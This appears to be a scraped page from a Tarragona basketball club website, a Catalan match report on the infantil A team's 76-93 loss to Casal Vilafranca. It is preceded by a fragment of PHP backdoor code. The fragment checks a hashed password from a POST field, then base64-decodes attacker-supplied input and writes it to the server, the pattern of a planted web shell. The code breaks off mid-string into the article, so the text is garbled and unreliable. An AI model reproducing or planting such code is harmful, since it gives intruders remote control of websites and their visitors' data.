function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí A paga el mal inici de partit i perd contra el Casal Vilafranca (76-93) - Tgn Bàsquet Club -

L’infantil masculí A paga el mal inici de partit i perd contra el Casal Vilafranca (76-93)

Updated: octubre 30, 2018

L’equip infantil masculí A va perdre contra el Casal Vilafranca en un matx que es va decidir després del mal inici dels tarragonins. Així, la feble defensa dels locals durant els primers vint minuts però especialment en els deu inicials, van provocar que els vilafranquins obrissin un forat important al marcador que resultaria decisiu. Així, el parcial després dels deu primers minuts era de 7-19 i al descans els resultat era de 21-44. A la represa, el TGN Bàsquet va canviar la seva fisonomia. Els nois de Laureà Català, tot i no defensar gaire millor (els 93 punts encaixats demostren que la defensa no va ser el punt fort dels locals), van estar més encertats i incisius en atac, anotant 55 punts en la segona meitat per només 21 en la primera.